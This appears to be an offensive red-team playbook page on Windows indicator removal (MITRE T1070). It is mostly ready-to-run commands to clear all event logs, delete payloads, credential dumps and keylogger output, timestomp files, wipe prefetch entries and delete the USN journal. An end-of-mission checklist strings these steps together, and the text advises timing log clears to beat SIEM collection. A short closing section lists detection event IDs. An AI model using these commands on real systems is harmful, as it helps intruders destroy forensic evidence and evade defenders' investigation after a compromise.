Skip to main content

T1070: Indicator Removal

Covers: T1070.001 - Clear Windows Event Logs, T1070.004 - File Deletion, T1070.006 - Timestomp


Technique Requirements​

Privileges RequiredAdministrator (event log clearing, prefetch deletion) / User (file deletion, timestomping own files)
Effective PermissionsContext of the invoking user
Employment Complexity1/5 - Very Low
Detection Complexity2/5 - Low (clearing a log generates a log entry confirming the clear β€” the absence of events is itself an indicator)

Background​

Indicator removal reduces the forensic evidence left by an operation. Every technique in this document leaves traces: event log entries, files in temp directories, registry keys, prefetch files, and file system timestamps. Cleaning up at the end of a sortie reduces what defenders can reconstruct.

Critical limitation: You cannot truly erase your tracks. The gaps you create are themselves indicators:

  • Clearing the Security event log generates Event ID 1102 (Security log cleared) in the Security log and Event ID 104 in the System log β€” visible to any SIEM that was collecting before the clear
  • Gaps in event log sequence numbers are detectable by forensic tools
  • Sysmon EventID 11 (FileCreate) for your payload files may already have been forwarded to a SIEM before you deleted them
  • Prefetch files may have already been imaged by endpoint software

Operational guidance: Cleanup is most valuable when the SIEM is not in real-time forwarding mode β€” if logs are collected on a delay or batch-forwarded, clearing them before the collection window closes removes evidence. Against real-time SIEM collection, cleanup primarily helps against local forensic analysis (disk imaging, memory acquisition after the fact) rather than defeating active monitoring.

Run cleanup before terminating your session, not after β€” some cleanup steps (notably AMSI bypass, service cleanup) require an active elevated session.


Method 1: Event Log Clearing (T1070.001)​

LOL binary used: wevtutil.exe

List all available logs (identify what was written to)​

wevtutil el
# Show log details including record count:
wevtutil gl Security
wevtutil gl System
wevtutil gl "Microsoft-Windows-Sysmon/Operational"

Clear individual logs​

# The four highest-value logs to clear:
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
wevtutil cl "Microsoft-Windows-Sysmon/Operational"

Clear additional operational logs relevant to LOL techniques​

# PowerShell script block logging
wevtutil cl "Microsoft-Windows-PowerShell/Operational"

# WMI activity (T1546.003)
wevtutil cl "Microsoft-Windows-WMI-Activity/Operational"

# BITS transfers (T1197 / T1105)
wevtutil cl "Microsoft-Windows-Bits-Client/Operational"

# Task Scheduler (T1053)
wevtutil cl "Microsoft-Windows-TaskScheduler/Operational"

# Windows Defender events (T1562.001)
wevtutil cl "Microsoft-Windows-Windows Defender/Operational"

Clear all logs at once (comprehensive but very noisy)​

# PowerShell one-liner β€” clears every log on the system:
wevtutil el | ForEach-Object { wevtutil cl "$_" }
caution

Clearing the Security log generates Event ID 1102 ("The audit log was cleared") in the Security log itself, and Event ID 104 in the System log. These events identify the account that performed the clear. If a SIEM is collecting in real-time, these events will be forwarded before the clear completes. Clear logs as the very last step before terminating the session.

Export before clearing (if you want a copy for your records)​

# Save a copy of the Security log before clearing:
wevtutil epl Security C:\Windows\Temp\security_backup.evtx

Method 2: File Deletion (T1070.004)​

LOL binaries used: cmd.exe, powershell.exe

Delete payload files, staging directories, log files, and any other artifacts created during the operation.

Standard deletion​

# Delete a single file (force, no prompt):
del /f /q C:\Windows\Temp\payload.exe

# Delete multiple files:
del /f /q C:\Windows\Temp\payload.exe C:\Windows\Temp\lsass.dmp C:\Windows\Temp\sam.hive

# Delete all files in a directory:
del /f /q C:\Windows\Temp\perf\*

# Remove a directory and all contents:
rd /s /q C:\Windows\Temp\perf

PowerShell deletion​

Remove-Item "C:\Windows\Temp\payload.exe" -Force
Remove-Item "C:\Windows\Temp\perf" -Recurse -Force

Standard cleanup checklist​

After any operation, delete:

del /f /q C:\Windows\Temp\*.exe
del /f /q C:\Windows\Temp\*.dll
del /f /q C:\Windows\Temp\*.dmp
del /f /q C:\Windows\Temp\*.hive
del /f /q C:\Windows\Temp\*.txt
del /f /q C:\Windows\Temp\*.b64
del /f /q C:\Windows\Temp\*.cab
del /f /q C:\Windows\Temp\*.msi
del /f /q C:\Windows\Temp\*.mof
del /f /q C:\Windows\Temp\*.cs
del /f /q C:\Windows\Temp\*.ps1

Secure deletion note​

del and Remove-Item mark the file's MFT record as free but do not overwrite the data clusters. Forensic tools can recover deleted files until those clusters are overwritten by new data. For high-sensitivity operations, overwrite before deleting using cipher:

# Overwrite all deleted files' content in a directory (writes 3 passes over free space):
cipher /w:C:\Windows\Temp
note

cipher /w is slow on large volumes. Scope it to your specific staging directory rather than C:\. It only overwrites already-deleted file clusters β€” run it after del, not before.


Method 3: Timestomping (T1070.006)​

LOL binary used: powershell.exe (pure .NET, no external binary)

Timestomping modifies the creation, modification, and access timestamps of files to make them appear older than they are, blending them into the existing file system timeline. This complicates timeline-based forensic analysis.

Get current timestamps​

$file = "C:\Windows\Temp\payload.exe"
$item = Get-Item $file
$item | Select-Object Name, CreationTime, LastWriteTime, LastAccessTime

Set timestamps to match a reference file (most effective β€” copy timestamps from a legitimate system file)​

$target = "C:\Windows\Temp\payload.exe"
$reference = "C:\Windows\System32\notepad.exe"

$ref = Get-Item $reference
[System.IO.File]::SetCreationTime($target, $ref.CreationTime)
[System.IO.File]::SetLastWriteTime($target, $ref.LastWriteTime)
[System.IO.File]::SetLastAccessTime($target, $ref.LastAccessTime)

Set timestamps to an arbitrary date​

$target = "C:\Windows\Temp\payload.exe"
$fakeDate = [DateTime]"2023-06-15 09:30:00"

[System.IO.File]::SetCreationTime($target, $fakeDate)
[System.IO.File]::SetLastWriteTime($target, $fakeDate)
[System.IO.File]::SetLastAccessTime($target, $fakeDate)

Bulk timestomp a directory​

$dir = "C:\Windows\Temp\perf"
$reference = "C:\Windows\System32\notepad.exe"
$ref = Get-Item $reference

Get-ChildItem $dir | ForEach-Object {
[System.IO.File]::SetCreationTime($_.FullName, $ref.CreationTime)
[System.IO.File]::SetLastWriteTime($_.FullName, $ref.LastWriteTime)
[System.IO.File]::SetLastAccessTime($_.FullName, $ref.LastAccessTime)
}
note

Timestomping modifies the $STANDARD_INFORMATION attribute in the MFT. Forensic tools (Autopsy, Plaso) also examine the $FILE_NAME attribute, which Windows does not expose via the standard API β€” it can only be modified with direct MFT manipulation. The $FILE_NAME timestamps will still show the true creation time on a forensic image, making timestomping detectable to examiners with raw MFT access. Against live-system timeline analysis (dir, Explorer, standard forensics), timestomping is effective.


Method 4: Prefetch Deletion​

LOL binary used: cmd.exe
Requires: Administrator

Windows Prefetch records every executable that has run β€” including payload.exe, regsvr32.exe invocations, mshta.exe with unusual arguments, and lsass.exe dumps β€” in C:\Windows\Prefetch\. Each .pf file records the time the executable last ran and what files it accessed.

# List prefetch files (see what's been recorded):
dir C:\Windows\Prefetch\*.pf

# Delete prefetch for a specific binary:
del /f /q "C:\Windows\Prefetch\PAYLOAD.EXE-*.pf"

# Delete all prefetch files:
del /f /q C:\Windows\Prefetch\*.pf
caution

Deleting all prefetch files is detectable β€” an empty Prefetch directory on a system that has been running for months is anomalous. Prefer targeted deletion of specific binaries you ran rather than wiping the entire directory.


Method 5: USN Journal Deletion​

LOL binary used: fsutil.exe
Requires: Administrator

The USN (Update Sequence Number) Journal records all file system changes β€” file creation, deletion, rename, attribute modification β€” on NTFS volumes. Forensic tools use the USN Journal to reconstruct file activity even after files are deleted.

# Delete the USN journal on C:
fsutil usn deletejournal /d C:
caution

Deleting the USN Journal is an extreme action. Windows recreates it automatically, but the gap in the journal is detectable by forensic tools. Only use this on high-sensitivity operations where the forensic investigation risk justifies it.


End-of-Mission Cleanup Checklist​

Run these steps in order at the end of every session before disconnecting:

REM 1. Remove persistence mechanisms (if placed)
REM - Delete Run key values, scheduled tasks, services β€” see cleanup steps in each technique file

REM 2. Remove payload and staging files
del /f /q C:\Windows\Temp\*.exe
del /f /q C:\Windows\Temp\*.dll
del /f /q C:\Windows\Temp\*.dmp
del /f /q C:\Windows\Temp\*.hive

REM 3. Remove credential dump files
del /f /q C:\Windows\Temp\lsass.dmp
del /f /q C:\Windows\Temp\sam.hive
del /f /q C:\Windows\Temp\system.hive
del /f /q C:\Windows\Temp\security.hive
del /f /q C:\Windows\Temp\ntds.dit

REM 4. Remove keylogger output
del /f /q C:\Windows\Temp\keys.txt
del /f /q C:\Windows\Temp\clip.txt

REM 5. Remove any script/source files
del /f /q C:\Windows\Temp\*.cs
del /f /q C:\Windows\Temp\*.ps1
del /f /q C:\Windows\Temp\*.vbs
del /f /q C:\Windows\Temp\*.js
del /f /q C:\Windows\Temp\*.mof

REM 6. Overwrite free space in staging dir
cipher /w:C:\Windows\Temp

REM 7. Clear targeted prefetch entries
del /f /q "C:\Windows\Prefetch\PAYLOAD*.pf"
del /f /q "C:\Windows\Prefetch\RUNDLL32*.pf"
del /f /q "C:\Windows\Prefetch\REG*.pf"

REM 8. Restore security tools if disabled
REM powershell Set-MpPreference -DisableRealtimeMonitoring $false

REM 9. Clear event logs (last step β€” do this immediately before disconnecting)
wevtutil cl Security
wevtutil cl System
wevtutil cl "Microsoft-Windows-Sysmon/Operational"
wevtutil cl "Microsoft-Windows-PowerShell/Operational"
wevtutil cl "Microsoft-Windows-TaskScheduler/Operational"
wevtutil cl "Microsoft-Windows-Bits-Client/Operational"
wevtutil cl "Microsoft-Windows-WMI-Activity/Operational"

Log Detection​

  • Source: Security
    • EventID:1102 β€” Security log was cleared β€” contains the account name that cleared it
  • Source: System
    • EventID:104 β€” System log was cleared
  • Source: Microsoft-Windows-Sysmon/Operational
    • EventID:1 (ProcessCreate)
      • wevtutil.exe with cl argument
      • cipher.exe with /w: argument
      • fsutil.exe with usn deletejournal
    • EventID:11 (FileCreate) / FileDelete
      • Mass deletion of .exe, .dmp, .hive files from temp directories
  • Source: Security
    • EventID:4688 (Process creation with command line auditing)
      • Same patterns as Sysmon EventID 1
  • Absence of events: A gap in the Security log sequence numbers, or a log with only Event ID 1102 and nothing before it, is a reliable indicator that the log was cleared mid-operation.